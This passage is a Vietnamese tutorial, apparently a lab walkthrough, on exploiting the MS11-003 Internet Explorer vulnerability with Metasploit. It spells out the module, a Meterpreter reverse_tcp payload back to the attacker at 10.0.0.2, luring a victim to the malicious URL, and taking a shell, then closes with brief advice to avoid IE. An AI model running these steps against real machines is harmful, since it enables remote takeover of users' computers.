Sau khi chỉnh sửa xong địa chỉ IP ta lưu lại và khởi động lại card mạng bằng lệnh # /etc/init.d/networking restart Tiếp tục ta gõ lệnh # msfconsole để khai thác lỗ hổng thông qua công cụ Metasploit. Sau khi gõ lệnh sẽ hiện thị kết quả như hình bên dưới:
Ta tiếp tục gõ lệnh search ms11_003 để tìm kiếm lỗ hổng MS11_003 trên CSDL của Metasploit. Hiển thị kết quả như hình bên dưới là thành công:
Ta gõ tiếp dòng lệnh use exploit/windows/browser/ms11_003_ie_import , tiếp theo ta thiết lập IP lắng nghe khi có kết nối trả về máy attacker set SRVHOST 10.0.0.2 Sau đó gõ tiếp lệnh set URIPATH / để thiết lập đường dẫn đánh lừa victim. Gõ lệnh : set payload windows/meterpreter/reverse_tcp với mục đích để chiếm phiên làm việc của victim. Tạo payload lắng nghe trên địa chỉ của attacker và port 444 bằng lệnh : set LHOST 10.0.0.2 Gõ tiếp exploit để thực thi payload. Mọi thứ hoàn tất và thành công sẽ hiển thị giống như hình bên dưới.
Ta tìm cách đánh lừa người dùng truy cập vào dường dẫn trên máy attacker để chiếm quyền điều khiển. Đường dẫn giống như hình bên dưới:
Người dùng truy cập vào đường dẫn trên máy attacker đã được thiết lập mã độc sẽ hiển thị như hình bên dưới.
Sau khi người dùng nhiễm mã độc trên trình duyệt IE sẽ bị treo và không tắt được, trên máy attacker sẽ hiển thị như hình sau:
Tiếp ta sẽ gõ lệnh sessions và gõ lệnh sessions –i 1 để tương tác với sessions 1. Gõ lệnh sysinfo để xem thông tin về máy victim.
Bắt đầu chiếm quyền điều khiển máy victim với lệnh shell. Sau đó ta có thể tạo thư mục để đánh dấu mình đã xâm nhập thành công.
Hướng bảo mật và phòng tránh bị hacker tấn công:
- Lỗi MS11_003 thông qua gửi các tập tin html và css để chạy các đoạn mã nhằm xâm nhập máy tính nạn nhân để có thể đạt được quyền ngang bằng với quyền hạn của người truy cập lúc bấy giờ.
- Để tránh bị hacker lợi dụng lỗi MS11_003 để chiếm quyền điều khiển máy tính của mình thì người dùng sử dụng Windows 7 không nên sử dụng trình duyệt IE. Trình duyệt IE trên Windows 7 chưa lỗ hổng bảo mật nghiêm trọng để các hacker có thể dễ dang khai thác và tấn công máy người dùng. Ta có thể sử dụng các trình duyệt bảo mật tốt hơn hiện nay được rất nhiều người sử dụng như: Chrome, Firefox hay trình duyệt Microsoft Edge,…
Video hướng dẫn:
